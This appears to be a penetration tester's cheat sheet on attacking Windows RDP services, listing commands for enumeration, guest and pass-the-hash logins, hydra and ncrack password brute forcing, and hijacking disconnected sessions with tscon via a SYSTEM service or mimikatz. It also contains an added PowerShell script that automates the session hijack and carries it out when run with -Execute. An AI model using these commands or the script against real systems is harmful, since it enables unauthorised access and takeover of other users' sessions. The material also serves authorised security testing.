Target.Host.Service.RDP.txt
`` Scanning
-- rdp-enum-encryption lists the supported security layers/encryption levels (tells you whether NLA/CredSSP is required); rdp-ntlm-info leaks hostname, domain and OS build from the NTLM challenge
~$ nmap -p 3389 --script rdp-enum-encryption,rdp-ntlm-info VAR_TARGET_HOST
`` Connection
-- guest/guest only works where the Guest account is enabled and allowed to log on through Remote Desktop
~$ rdesktop -u guest -p guest -g 85% VAR_TARGET_HOST
-- -r disk:share=/root/ exposes the attacker's /root/ inside the session as \\tsclient\share (handy for moving tools both ways)
~$ rdesktop -u VAR_USERNAME -p VAR_PASSWORD -g 85% -r disk:share=/root/ VAR_TARGET_HOST
`` PTH
-- PTH over RDP needs Restricted Admin mode on the target: Windows 8.1 / Server 2012 R2 and later (older hosts only with KB2871997); if DisableRestrictedAdmin is set to 1 the logon is refused
~$ xfreerdp /u:VAR_USERNAME /d:VAR_DOMAIN /pth:VAR_NT_HASH /v:VAR_TARGET_HOST
`` Password Bruteforcing
-- check the lockout policy first (net accounts, or net accounts /domain); hydra itself warns that RDP servers dislike many parallel connections, hence -t 1 (and --stealthy-linear for ncrack)
~$ hydra -V -t 1 -l VAR_USERNAME -P VAR_WORDLIST_PASSWORD rdp://VAR_TARGET_HOST
~$ ncrack -vv --pairwise -U ../usernames.txt -P ../passwords.txt -f --stealthy-linear rdp://VAR_TARGET_HOST
`` Hijacking disconnected sessions
`` Using service
~> query user
-- note the ID of the disconnected (Disc) session you want and the SESSIONNAME of your own session (marked with >); below, 2 is the target ID and rdp-tcp#1 is your own session
-- the service runs as SYSTEM, which is why tscon can attach to another user's session without their password
~> sc.exe create VAR_STRING binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#1" type= own
-- start reports error 1053 (cmd.exe never checks in with the SCM) but tscon has already switched the session by then
~> sc.exe start VAR_STRING
~> sc.exe delete VAR_STRING
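Added example, not part of this cheat sheet: a PowerShell script that automates the service-based hijack above (quser, then sc.exe create/start/delete wrapping tscon). It assumes you run it from your own interactive RDP or console session as a local admin, that quser, sc.exe and tscon are on PATH, and uses the same placeholder service name as the cheat sheet. Without -Execute it only prints what it would run.

```powershell
# Added example, not from the original cheat sheet: automates the "Using service"
# steps (quser -> sc.exe create/start/delete with tscon).
# Assumptions: run from your own interactive RDP/console session as a local admin
# (sc.exe create needs admin; the service itself runs as SYSTEM, which is why tscon
# can attach to another user's session without a password); quser, sc.exe and
# tscon are on PATH; the service name is a placeholder, as in the cheat sheet.
param(
    [string]$ServiceName = 'VAR_STRING',
    [int]$TargetId = 0,          # 0 = first disconnected session found
    [switch]$Execute             # without -Execute only show what would run
)

# quser columns: USERNAME SESSIONNAME ID STATE IDLE LOGON. A disconnected session has
# an empty SESSIONNAME, so a whitespace split shifts the columns; instead make the
# session name optional and key on the numeric ID (session names such as console or
# rdp-tcp#1 are never purely numeric). The current session is prefixed with '>'.
$pattern = '^\s*(?<self>>?)(?<user>\S+)\s+(?:(?<session>\S+)\s+)?(?<id>\d+)\s+(?<state>\S+)'

$sessions = @(quser 2>$null | Select-Object -Skip 1 | ForEach-Object {
    if ($_ -match $pattern) {
        [pscustomobject]@{
            User    = $Matches['user']
            Session = $Matches['session']   # $null for disconnected sessions
            Id      = [int]$Matches['id']
            State   = $Matches['state']
            IsMine  = ($Matches['self'] -eq '>')
        }
    }
})

$mine = $sessions | Where-Object { $_.IsMine } | Select-Object -First 1
if (-not $mine -or -not $mine.Session) {
    throw 'Cannot determine your own session name; run this from an interactive session, not from a remote shell.'
}

$disconnected = @($sessions | Where-Object { $_.State -eq 'Disc' })
if ($disconnected.Count -eq 0) { Write-Host 'No disconnected sessions to hijack.'; return }
$disconnected | Format-Table User, Id, State -AutoSize | Out-String | Write-Host

$target = if ($TargetId) { $disconnected | Where-Object { $_.Id -eq $TargetId } } else { $disconnected[0] }
if (-not $target) { throw "Session $TargetId is not a disconnected session." }

# tscon <target id> /dest:<your session name>; /k keeps cmd.exe alive long enough for tscon to run.
$binPath = "cmd.exe /k tscon $($target.Id) /dest:$($mine.Session)"
Write-Host "Hijacking session $($target.Id) ($($target.User)) into $($mine.Session)"
Write-Host "sc.exe create $ServiceName binpath= `"$binPath`" type= own"

if ($Execute) {
    sc.exe create $ServiceName binpath= $binPath type= own | Out-Null
    # start returns error 1053 (cmd.exe never reports to the SCM) but tscon has already
    # switched the session by then; delete the service to clean up.
    sc.exe start $ServiceName | Out-Null
    sc.exe delete $ServiceName | Out-Null
}
```

Usage: `.\hijack.ps1` lists the disconnected sessions and the exact sc.exe line; `.\hijack.ps1 -TargetId 2 -Execute` performs the hijack. sc.exe is called by its full name because `sc` is an alias for Set-Content in Windows PowerShell.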
`` Using mimikatz
-- needs local admin: ts::sessions lists the sessions, privilege::debug and token::elevate get you SYSTEM, ts::remote then does the tscon for the given session ID
~> mimikatz
mimikatz # ts::sessions
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # ts::remote /id:2